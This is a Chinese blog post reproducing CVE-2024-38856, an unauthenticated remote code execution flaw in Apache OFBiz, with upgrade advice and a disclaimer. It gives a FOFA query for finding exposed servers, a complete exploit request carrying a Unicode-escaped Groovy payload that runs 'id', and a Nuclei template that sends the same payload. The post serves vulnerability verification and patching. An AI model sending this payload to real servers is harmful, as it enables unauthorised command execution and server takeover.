【漏洞复现】Apache OFBiz 授权不当致远程代码执行

于 2024-08-06 10:08:17 发布
阅读量263 收藏 2
点赞数 3
分类专栏: 漏洞复现 文章标签: apache 威胁情报 命令执行 权限绕过 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53009585/article/details/140946581
版权

文章目录

0x00 漏洞描述

Apache OFBiz 是一个开源的企业资源计划 (ERP) 和客户关系管理 (CRM) 软件平台,提供全面的企业管理解决方案,包括电子商务、库存管理、制造、会计等功能,支持企业进行灵活的定制和扩展。
2024年8月,互联网上披露了Apache OFBiz 授权不当致代码执行漏洞(CVE-2024-38856)。该漏洞允许未经身份验证的远程攻击者通过特定的URL绕过安全检测机制执行恶意代码。攻击者可能利用该漏洞来执行恶意操作,包括但不限于获取敏感信息、修改数据或执行系统命令,最终可导致服务器失陷。

影响范围

Apache OFBiz <= 18.12.14

0x01 测绘工具

FOFA:app=“Apache_OFBiz”
在这里插入图片描述

0x02 漏洞复现

POST /webtools/control/main/ProgramExport HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/x-www-form-urlencoded
 
groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b

在这里插入图片描述在这里插入图片描述

0x03 Nuclei检测脚本

id: Apache OFBiz 授权不当致远程代码执行

info:
  name: Apache OFBiz 授权不当致远程代码执行
  author: admin
  severity: high
  description: 该漏洞允许未经身份验证的远程攻击者通过特定的URL绕过安全检测机制执行恶意代码。攻击者可能利用该漏洞来执行恶意操作,包括但不限于获取敏感信息、修改数据或执行系统命令,最终可导致服务器失陷。
  tags: rce

requests:
  - method: POST
    path:
      - "{{BaseURL}}/webtools/control/main/ProgramExport"

    headers:
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36

    body: |
      groovyProgram=\\u0074\\u0068\\u0072\\u006f\\u0077\\u0020\\u006e\\u0065\\u0077\\u0020\\u0045\\u0078\\u0063\\u0065\\u0070\\u0074\\u0069\\u006f\\u006e\\u0028\\u0027\\u0069\\u0064\\u0027\\u002e\\u0065\\u0078\\u0065\\u0063\\u0075\\u0074\\u0065\\u0028\\u0029\\u002e\\u0074\\u0065\\u0078\\u0074\\u0029\\u003b

    matchers:
      - type: word
        words:
          - "uid" 
        part: body
        condition: and

0x04 修复建议

目前官方已有可更新版本,建议受影响用户升级至最新版本:
Apache OFBiz >= 18.12.15
官方补丁下载地址: https://ofbiz.apache.org/download.html

0x05 免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。
请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。
作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

An0nymouer
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache OFBiz 授权不当远程代码执行漏洞(CVE-2024-38856)
0xSec
08-05 393
2024年8月,互联网上披露Apache OFBiz 授权不当远程代码执行漏洞(CVE-2024-38856),该漏洞允许未经过身份验证的远程攻击者绕过原有通过特定URL绕过检测执行恶意代码的安全机制。攻击者可能利用该漏洞执行恶意操作,包括但不限于获取敏感信息、修改数据或执行系统命令,最终可导致服务器失陷。
漏洞研究》Apache Log4j2 远程代码执行漏洞
1
11-04 1648
Apache Log4j2 组件存在远程代码执行漏洞(CVE-2021-44228),该漏洞是由于 Apache Log4j2 某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码
【已复现Apache OFBiz 授权不当代码执行漏洞(CVE-2024-38856)安全风险通告
最新发布
smellycat000的专栏
08-05 16
●点击↑蓝字关注我们,获取更多安全风险通告漏洞概述漏洞名称Apache OFBiz 授权不当代码执行漏洞漏洞编号QVD-2024-35284,CVE-2024-38856公开时间2024-08-04影响量级万级奇安信评级高危CVSS 3.1分数9.1威胁类型代码执行利用可能性高POC状态已公开在野利用状态未发现EXP状态未公开技术细节状态已公开危害描述:该漏洞允许攻击者绕过身份验证执行任意代码...
CVE-2024-36104 Apache OFBiz路径遍历RCE漏洞复现(附POC)
mashiro_hibiki的博客
06-05 594
高质量安全知识星球社区,致力于漏洞挖掘,渗透技巧,安全资料,星球承诺会持续更新0/1/NDay及对应的批量利用工具,团队内部漏洞库,内外网攻防技巧,你所需要的各类安全工具和资料以及团队师傅们最新的学习研究成果。,安全技术水平的催化者,星球针对成员的技术问题,快速提供思考方向及解决方案,并为星友提供多种方向的学习资料、安全工具、POC&EXP以及各种学习笔记等,以引导者和催化剂的方式助力安全技术水平的提升。Apache_OFBiz是一套基于通用架构的企业应用程序,使用通用数据,逻辑和流程组件。
Apache 项目中存在依赖混淆漏洞
smellycat000的专栏
04-23 40
聚焦源代码安全,网罗国内外最新资讯!作者:Alessandro Mascellino编译:代码卫士已归档的一个 Apache 项目中存在一个依赖混淆漏洞。Legit Security 公司发现了该漏洞,并表示这说明有必要审计第三方项目和依赖,尤其是被归档且有可能忽视了更新和安全补丁的第三方项目和依赖。该公司发布技术文章提到,尽管一般做法都是按照‘’如果没崩就不修”的心态将归档项目置之不理,但这些...
CVE-2020-9496 OFBIZ XML-RPC漏洞分析与漏洞复现
2301_80115097的博客
12-11 223
最近披露了Apache OFBiz授权远程代码执行漏洞,是对CVE-2020-9496的绕过,所以先来看看这个漏洞复现环境:17.12.03。
CVE-2021-25296 复现
YJ_12340的博客
05-30 623
代码中调用了 SafeObjectInputStream 对象的 readObject 进行反序列化,我们知道 SafeObjectInputStream 是重写后的 ObjectInputStream,在 ObjectInputStream 的基础上加了黑白名单过滤,我们来分析一下漏洞修复前的 SafeObjectInputStream 代码与修复后的差距,如下图所示。rmi 是 java 远程方法调用,它能让某个java虚拟机上的对象调用另一个Java虚拟机的对象的方法。危害:未授权远程命令执行
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 682
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
Apache OFBiz企业流程自动化-其他
06-11
Apache OFBiz是用于企业流程自动化的开源产品,包括ERP(企业资源规划)、CRM(客户关系管理)、电子商务/电子商务、SCM(供应链管理)、MRP(制造资源规划)、MMS / EAM(维护管理系统/企业资产管理)的框架组件和...
CVE-2021-26295 Apache OFBiz 反序列化漏洞.md
04-13
CVE-2021-26295 Apache OFBiz 反序列化漏洞
Apache OFBiz Cookbook
11-02
### Apache OFBiz Cookbook 知识点解析 #### 一、Apache OFBiz 概述 - **定义**:Apache OFBiz(Open For Business)是一款开源的企业级应用框架,它集成了ERP(企业资源规划)、CRM(客户关系管理)以及E-...
ofbizApache OFBiz-主要开发已移至ofbiz-frameworks存储库
02-03
ApacheOFBiz:registered: 欢迎使用ApacheOFBiz:registered: ! 一个功能强大的顶级Apache软件项目。 OFBiz是用Java编写的企业资源计划(ERP)系统,并包含大量库,实体,服务和功能,以运行您的业务的各个方面。 ...
Apache OFBiz Development The Beginner's Tutorial
09-21
### Apache OFBiz 开发入门教程知识点汇总 #### Apache OFBiz 概述 - **社区驱动的开源项目**:Apache OFBiz 是一个完全免费且由社区维护的开源项目。 - **功能强大**:作为最佳电子商务与企业资源规划(ERP)软件...
apache-ofbiz-16.11.02源码+ofbiz菜鸟笔记+Apache+OFBiz+开发初学者指南
09-14
apache-ofbiz-16.11.02.zip,ofbiz菜鸟笔记,Apache+OFBiz+开发初学者指南.chm
ApacheOFBiz企业流程自动化 v17.12.04
09-28
为您提供ApacheOFBiz企业流程自动化下载,Apache OFBiz是用于企业流程自动化的开源产品,包括ERP(企业资源规划)、CRM(客户关系管理)、电子商务/电子商务、SCM(供应链管理)、MRP(制造资源规划)、MMS / EAM...
开源ERP-apache-ofbiz-17.12.07.zip
05-31
Apache OFBiz 是用于企业流程自动化的开源产品,包括 ERP(企业资源规划)、CRM(客户关系管理)、电子商务/电子商务、SCM(供应链管理)、MRP(制造资源规划)、MMS / EAM(维护管理系统/企业资产管理)的框架组件...
Apache OFBiz企业流程自动化.rar
07-04
创建补丁以删除框架中的 IDEAL 代码 让电子商务组件反映 iDEAL 的新情况 添加会话跟踪模式并使 cookie 安全 删除对电子商务的 ftl 依赖 按字母顺序排列 UI 标签 Bug 电子商务电子邮件中的双斜杠 从采购发票创建会计...
apache-ofbiz-13.07.02.zip
08-14
apache-ofbiz-13.07.02.zip
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值